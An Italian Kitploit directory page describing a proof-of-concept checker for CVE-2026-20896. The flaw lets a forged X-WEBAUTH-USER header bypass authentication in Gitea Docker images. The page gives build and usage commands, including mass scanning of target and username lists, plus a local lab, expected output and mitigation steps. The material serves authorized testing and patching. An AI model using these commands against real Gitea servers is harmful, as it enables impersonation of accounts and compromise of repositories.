Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER verificatore di bypass dell'autenticazione | Kitploit
Strumenti/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER verificatore di bypass dell'autenticazione

Vedi Repository
101 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20896 Checker per il Bypass dell'Autenticazione Docker di Gitea

Solo per operazioni autorizzate di red team / penetration test.

Questo repository contiene un checker minimale per CVE-2026-20896, un bypass dell'autenticazione nelle immagini Docker ufficiali di Gitea fino alla versione 1.26.2 inclusa quando l'autenticazione tramite reverse-proxy è abilitata.

Cos'è CVE-2026-20896

Le immagini Docker di Gitea affette includevano un template app.ini con:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

Quando un amministratore abilitava:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea considerava attendibile l'header X-WEBAUTH-USER proveniente da qualsiasi indirizzo IP in grado di raggiungere direttamente la porta HTTP del container. Un client che aggirava il reverse proxy autenticante previsto poteva inviare un singolo header e impersonare un utente noto o indovinabile.

L'impatto pratico è l'impersonificazione di account non autenticati. Se l'utente indovinato è un amministratore, il caso peggiore è la totale compromissione dell'istanza Gitea e dei suoi repository a livello applicativo. L'esecuzione remota di codice sull'host dipende dall'ambiente e non è rivendicata da questo checker.

Le versioni corrette iniziano con 1.26.3; si consiglia di aggiornare a 1.26.4 o successiva.

Come funziona il PoC

Il checker:

  1. Recupera la pagina principale del target.
  2. Cerca nel footer testo come Powered by Gitea Version: 1.26.4.
  3. Salta il test per impostazione predefinita se la versione parsata è >= 1.26.3.
  4. Invia richieste GET / con X-WEBAUTH-USER: <username> per ogni nome utente fornito.
  5. Segnala un risultato positivo quando il titolo della pagina restituita assomiglia a una dashboard di un utente loggato.

La versione Go supporta più target, file di username, concorrenza, timeout, output JSONL, TLS --insecure, --dry-run e --force.

Compilazione

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

Non sono richieste dipendenze Go di terze parti.

Utilizzo

Target singolo:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

Target multipli e username:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

Prova a secco:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Fallback Bash:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

Codici di uscita

  • 0: almeno un'impersonificazione vulnerabile confermata
  • 1: nessuna impersonificazione vulnerabile confermata
  • 2: errore di utilizzo, input o runtime

Laboratorio di riproduzione locale

Il seguente laboratorio avvia un container Gitea locale affetto e crea un utente di test:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

Risultato positivo previsto:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

Pulizia:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

Mitigazione

  • Aggiorna Gitea a 1.26.3 o successiva; 1.26.4 o successiva è preferita.
  • Non esporre direttamente la porta HTTP del container Gitea backend a reti non fidate.
  • Configurare esplicitamente i reverse proxy fidati.
  • Mantenere disabilitata l'autenticazione tramite reverse proxy a meno che il percorso di rete e il confine di fiducia del proxy non siano compresi.

Riferimenti

  • Avviso Gitea: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Note di rilascio Gitea per 1.26.3 / 1.26.4: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • PR di correzione: https://github.com/go-gitea/gitea/pull/38151
  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • Report di sondaggio in natura tramite The Hacker News / Sysdig telemetry: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
Scarica lo strumento